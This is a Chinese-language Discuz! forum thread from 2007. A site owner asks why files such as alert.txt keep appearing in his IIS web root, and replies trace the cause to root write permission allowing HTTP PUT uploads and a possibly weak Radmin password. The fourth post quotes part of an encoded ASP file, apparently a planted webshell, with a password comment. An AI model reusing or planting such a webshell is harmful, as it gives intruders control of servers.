Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

我的网站在根目录下面老是出现alert.txt这么一个文件,怎么回事呀

[复制链接]
水无涯 发表于 2007-1-13 12:52:07 | 显示全部楼层 |阅读模式
我网站的根目录下面老是出现alert.txt这么一个文件,每次删除后,一段时间又有了。而且里面的内容说我的系统安全性有一些问题,让我修复,留言是:ZwelL。是不是我的网站被黑了,还是我们的ss系统本身能够检测到系统安全漏洞呀。我该怎么怎么处理呢?alert.txt内容如下:There are some secure problems in you system, please fix it. 我的系统环境是:

iis6+php 5.2.0+zend 3.2.0+mysql 4.0.38
 楼主| 水无涯 发表于 2007-1-13 12:54:06 | 显示全部楼层
所有的进程图如下:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

 楼主| 水无涯 发表于 2007-1-16 14:13:56 | 显示全部楼层
今天更严重了。出现了这么几个文件 alert.txt;t.txt;test.txt;StONe.txt.特别是test文件,根据内容看看向我的网站被攻破了。但是目前运行还比较正常。我想知道对方修改没有修改我的文件怎么看呀。有没有专门的工具呀。不管是ss还是discuz文件检查。我的都没有安装插件
回复

使用道具 举报

 楼主| 水无涯 发表于 2007-1-16 14:14:39 | 显示全部楼层
贴一部分TEST.txt的内容:


<%@ LANGUAGE = VBScript.Encode %>
<%#@~^LQAAAA==@#@&jdDhl/kP,~P,P~P{PELmW4bUoTEkr~~B登陆密码@#@&iAkAAA==^#~@%>
<%#@~^4mMAAA==@#@&t;{J琳        WkDm        ;s,NU2琳6q~[        2P,琳LxbtYKHxx        WO+j~,琳+dW^/R        xG/,P琳琳0(~9x3琳JrEr'(U)&?PYb.c+dxKwdn"P琳琳6(P9x2,~琳.YUV$?'JE:句语J5?EJL(?{qj~,PP琳b.D?s;UcY;1+X2R        xK/P,P~琳P,P7nkV2,~琳JrJJ{(j)&?,+Ok.        c+dxK2/I7琳7琳Txk4OK1x/"~D+j=+kWV;Rk]P,P~琳Jr@*ns(lYJ@!@*MYz@!@*[YJ@!@*Bo2o3w2:B{.W^W^~Mt@!EELqj'&j,P~,琳0&N        2,~P,琳JE@*mz@!页尾@*E#Jr'1h[JrSEJrJrJ'DOj^;j[rEJrJEcMY?s5UVsEwlDwrMmkl\mLEx0D4Pm@!I2k4xL@*lJ@!页一下@*EbEJLF3+LlK'rJSJrEJrJ'.D?V5jLJEJrEr`.D?^;?^V!o)DwrD1/C-mLB{W+MtPm@!Iwk4        [EJ'(U'(?,~d琳D6nH,PP~~,琳0(P9UAP~,P,PP,琳JrIwk4U[@*l&@!rJ[b'Jr@*B*EE[b[rJSJEErJE[MO?^;j'rJJEEr`.YUs$?s^Ew)YakM^/m\CLE'WnMtPm@!Jr[qUx(?,P,P~P~~琳/s2,~P,P~~,琳JJI2k4U[rELk'&?{q?,P,~P,P~琳xtP~olhxk,0q,~~P,P,P琳.Wo~Dka2,U+4K~Hh@*k~W&P~P,~,P~琳R_a?PKK,2?{k~DKs~~,PP,琳Wk,NxAlq'a?=+dV3lROnomK'a?lUtK~0@*+Llh~6q~,P,PP琳rJp2/(x'@*mz@!页一上@*E#Jr'F +omK'Jr~rJEJEELDO?^5?LJEErJJc.D?s;Us^Eo=YakD1/m-lNBx0D4~m@!iad4        [@*m&@!页首@*E#8~EJEErJ'DDjV$?'ErJJEEvDO?^5UVs!s=YwbD1dl7l%B{0n.4Pl@!Iwk4xLI2/(xLJE[(j{qjP,~P,P琳Un4KPq@*gn~0&~,P~琳gnLJJJJr'+TlK[rJ:码页I2k4xLEJLZILEE:数录记@*M+DxnmxUTksl,EJLFQHw[JEx        l2/^G1P[D@!@*DY@!Jr'qU'(?,P~~琳琳*DYUs;U`+9G/xAVsYu'.OUV5?i琳7琳JrJEx&?)(j,+OkM        c+d        Wa/+"d琳i琳2WKS~P,P琳Oa1+7GHc/I,~~P,P琳rJ@*DO&@!JE[&j'&?~~i琳Y6nH,P7琳Jr@*9Y&@!Jr[W6x&sW;[EJ@*JE'MWVK^o~[Jrx.W^W1o8P[O@!JE[&j'&?~~,Pd琳W(,NU2,~,P~,P,琳##Z*Bbkv/]`D0nJv+NK^xASH:uxW6x&VGZ~~,P~P,~P,P琳nd^2P~~,P~P,琳b*kckIv+NKm        3StKu'K0U(^WZ,~P,PP,~~P,琳xtPPqx;I~0&~P,P~~,P琳0r~9x3)rEw2oAsAaJr'MGVKmLA=+dsA)JrXsls*w:EJ{DKVGmL$=xnt:~Jrs3oAs2:Er'.W^G1o$,0&PP,P,~P,琳FR1wPGP,!'b~DKsP,7琳~PrJ@*NOz@!@*DxG0J@!6@*BdL        kNLUbhv'^m0~DxK0@!@*m1^m1m:'MWsG1o4,[Y@!@*DD@!EJLqU'(?~~i琳JEsAo2w2:Er'DGsKmLA,~i琳FRDx!WZ{Y        ;W;P~d琳Z@*OU!WZ,[xzP#6G$RkI,DGPWGARdIvOWgPnsbt~GGP~P,琳琳Er@*.Dz@!JJLqUxqUP~P,琳YangPP,~琳o        ktDGU'9VwPO+j~,P~P,琳EJ@*NO&@!JJ'nslHR9sw[Er@*ED+Dx^B{xLk^l~[D@!Jr'qU'qU~~P,P,琳#U`hnDq /9s+bs d"'Nso,Yn?,~,P~,琳F 1s,WD~!{x~DKs~~,P琳P,7Jr@*ND&@!@*9Y@!@*^m^^1m:'MGVKmL8,* xO4or+4~MY@!@*+^4lD@!rE[&?xqUP~~,琳+omK'olanOE^Wk4CRd],xnt:~F@*+LChP0(~,P~琳1hxoChP        +tgK@*oCn,0(~,PP琳8x+Tln,UntZ'noCK,D6PrEJr'nLmnPW(,P~P琳*nTlKvo        VZ{+TCn,xntEErJ@*@!nomnP6(~P,P琳*JE+LChJE`Dd+!;n.{+oCK,P~P琳DU!W/omnRkI{Hn,P~P琳yrjolh /"'Y        ;GZ,P,P琳T xn.kj+TCnc/]~,PP琳OU!W/NMG1+]c/"'Z"P,~P琳Dx;W;Rd[^+kw /"'1w~~P,琳FBFSxUG;~.YUs;UPUnaWRd],P~P琳*ErYnkNMWmIc8NKN)Jr`O^L4}nYm+D;xdI,Y?~P~~琳MYjV$j[rJ:句语行执EELq?x(UP~P,琳UtO,JrYmVdJr'b#+~.OUV;UcY6+Svndl;S,0(P~琳琳UtPPZq@**DOj^;?cUS~0&琳~,d琳~,d琳,Pd琳rJrE'&?lqUPnObDcn/        Wwkn]P,琳Jr@*nV8CDz@!@*MOz@!JE'&?'(j,P琳Lxb4DWH{/"PY?,~琳PaWGS,P琳~OX+1-WtR/"~~P,琳P6q~NU3,P~P琳rE@*9Y&@!@*lz@!Er[n:mH:[Er@*E#FBJrEJYJE[:CH:[Jr,PtrIw~MP:ZAS3?EErJcDDjV$?ss!s)O2bD^/m-mLv{0Dt,l@!EJLqj'&?~~,PP,琳EJ@*D4@!@*Cz@!T,VnN~,@*BbFBEJrJDEr[+hCgK'Jr,,2J~b:Pn}IGEJrJcDD?s5UVV!o)DwkM^dl7lNBx0n.4PC@!@*.+Dxn^{xorsmP[Y@!Er[(U'&?P,P,~P琳*JE2tbHmASAzPJr`/"xn:m1:P~d琳Un4Y~Jr3S~bPEr'#EEAneK|3dA):Jr`/"P6(P,P~琳0K2 d"PYKHPVk4        ~WGP,琳PO/.rw+-Wt /"P~琳Er@*NO&@!名@*.4@!表@*9Y@!@*B;ZZ;Z;:B{DGVKmL$,B*yv'Dtobn4PMY@!@*nV8CD@!EJL(?{qj~,琳P#T+vlh+4^UxnarcxxKZ{dI,Yn?,P琳.OU4f,U+arR        UGZ,P琳*#T~Xc:46`D^+N46nDl+./{xUW;~D+j,P琳,P琳xt:~!W@*bDD?89vx+d~0&PP琳琳rEEJ{qU)(?~nDk.cn/        W2dIP~琳Er@*UladJ@!@*Em(lB{Nb~xmwd@!@*+s8mYz@!@*:MW0J@!@*DDz@!JE[(j{qjP,琳EJ@*NO&@!
回复

使用道具 举报

网点 发表于 2007-1-16 14:15:48 | 显示全部楼层
这个你在环境搭建区 需求一些解决方法吧 .
回复

使用道具 举报

mokfly 发表于 2007-1-17 11:36:22 | 显示全部楼层
您请PM联系下我,好么?
回复

使用道具 举报

mokfly 发表于 2007-1-17 11:42:06 | 显示全部楼层
您好...

您应该是IIS给了根目录写权限,对方可以利用HTTP协议的PUT上传文件....

如果您对我的回答有其他疑问,可以联系我,如果没有疑问的话,也请做出相应的回答...

PS:radmin是您自己装的么?密码是否过于简单呢?

[ 本帖最后由 mokfly 于 2007-1-17 11:44 编辑 ]
回复

使用道具 举报

 楼主| 水无涯 发表于 2007-1-17 16:48:39 | 显示全部楼层

回复 #7 mokfly 的帖子

谢谢您 mokfly。我查看了就是给于了根目录写入权限。我已经更改了,将其更改为html写入。radmin是自己安装的。密码马上修改哈。是不是radmin也不安全呀。现在真是没有安全的东西了
回复

使用道具 举报

antdk 发表于 2007-1-17 16:51:58 | 显示全部楼层
这样的服务器这么多第三方的进程还敢用,I 服了 you。
回复

使用道具 举报

bigpig829 发表于 2007-2-6 22:24:38 | 显示全部楼层
应该是用了zwell写的exp =.= 自动留下的alert.txt
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-15 07:14 , Processed in 0.033109 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表